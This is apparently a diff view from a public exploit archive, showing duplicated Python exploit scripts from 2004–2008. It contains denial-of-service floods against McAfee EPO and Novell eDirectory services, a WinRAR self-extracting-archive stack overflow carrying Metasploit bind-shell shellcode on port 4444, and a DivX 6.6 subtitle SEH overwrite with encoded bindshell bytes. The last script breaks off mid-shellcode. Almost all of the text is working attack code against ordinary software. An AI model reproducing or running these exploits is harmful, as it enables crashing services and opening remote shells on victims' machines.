while 1:
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*243
req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
data=expl.recv(1024)
print data
expl.close()
sleep(0.1)
# milw0rm.com [2008-04-02]
#!/usr/bin/python
# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
# More than meets the eye
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/mcafee_again.py.txt
# EAX 00840C30
# ECX 00837830
# EDX 01EACF18
# EBX 00004000
# ESP 01EAFF04
# EBP 01EAFF38
# ESI 00837830
# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
# EIP 42424242
import socket
import os
import sys
from time import sleep
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
while 1:
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*243
req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
expl.send (req)
data=expl.recv(1024)
print data
expl.close()
sleep(0.1)
# milw0rm.com [2008-04-02]

42
platforms/windows/dos/5344.py
View file

@ -1,21 +1,21 @@
#!/usr/bin/python
# Novel eDirectory HTTP DOS
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/novel-edir.py.txt
import socket
import os
import sys
from time import sleep
biff="<"*2048
print "[*] Payload sent "+ str(len(buff))
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8028 ) )
expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
data=expl.recv(1024)
print data
expl.close()
# milw0rm.com [2008-04-02]
#!/usr/bin/python
# Novel eDirectory HTTP DOS
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/novel-edir.py.txt
import socket
import os
import sys
from time import sleep
biff="<"*2048
print "[*] Payload sent "+ str(len(buff))
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8028 ) )
expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
data=expl.recv(1024)
print data
expl.close()
# milw0rm.com [2008-04-02]

6
platforms/windows/dos/599.py
View file

@ -28,6 +28,6 @@ try:
s.close()
print "\nRun this script again, and server should crash."
except:
print "\nCould not connect to sever!"
# milw0rm.com [2004-10-26]
print "\nCould not connect to sever!"
# milw0rm.com [2004-10-26]

172
platforms/windows/local/1985.py
View file

@ -1,86 +1,86 @@
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
======================================================
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
sc +="\x4f\x4f\x42\x4d\x5a"
buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2
try:
info = open(sfxnfo__, "w+b")
info.write(buf)
info.close()
except IOError:
sys.exit("Error: unable to create: " + sfxnfo__)
print "Creating archive:",
os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
print "done."
print "Executing:",
# debug only!
#os.spawnv(os.P_WAIT, result__, [result__, ""])
#print "done."
print "Cleaning up:",
os.remove(sfxnfo__)
print "done."
# milw0rm.com [2006-07-05]
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
======================================================
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
sc +="\x4f\x4f\x42\x4d\x5a"
buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2
try:
info = open(sfxnfo__, "w+b")
info.write(buf)
info.close()
except IOError:
sys.exit("Error: unable to create: " + sfxnfo__)
print "Creating archive:",
os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
print "done."
print "Executing:",
# debug only!
#os.spawnv(os.P_WAIT, result__, [result__, ""])
#print "done."
print "Cleaning up:",
os.remove(sfxnfo__)
print "done."
# milw0rm.com [2006-07-05]

330
platforms/windows/local/5462.py
View file

@ -1,165 +1,165 @@
#!/usr/bin/python
#######################################################################
# DivX 6.6 SRT SEH overwrite PoC
# Tested on XP SP2
# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
# muts..at..offensive-security...dot..com
# chris..at..offensive-security...dot..com
# http://www.offensive-security.com/0day/divx66.py.txt
# Notes: Unicode buffer - real pita.
# Greetz to our wives - thanks for the couch!
#######################################################################
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#######################################################################
# file = name of avi video file
file="infidel.srt"
# Unicode friendly POP POP RET somewhere in DivX 6.6
# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods
ret="\x94\x48"
# Align stack for register save
nudge="\x48\x6d"
# Payload building blocks
buffer="\x41" * 1032
xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop
pushad="\x60\x6d" # Save stack registers,nop
pushfd="\x9c\x6d"
align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer
align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd
popfd="\x9D\x6D" # popfd,nop
popad="\x61\x6D"# popad,nop
padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode
rest= "\x01" * 5000000 # Buffer and shellcode canvas
# PoC Venetian Bindshell on port 4444 - ph33r
# Built on alternating 00 01 surface
# Venetian self decoding bindshell - 1580 bytes
bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40"
"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D"
"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80"
"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE"
"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40"
"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D"
"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF"
"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D"
"\x40\x6D\x80\xBF\x6D\x40\x6D"
"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80"
"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2"
"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D"
"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40"
"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D"
"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80"
"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C"
"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D"
"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02"
"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40"
"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F"
"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D"
"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40"
"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80"
"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40"
"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D"
"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80"
"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67"
"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D"
"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D"
"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80"
"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54"
"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40"
"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D"
"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94"
"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D"
"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D"
"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80"
"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3"
"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D"
"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80"
"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D"
"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80"
"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40"
"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80"
"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58"
"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40"
"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80"
"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD"
"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D"
"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40"
"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80"
"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74"
"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D"
"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40"
"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D"
"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80"
"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D"
"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D"
"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80"
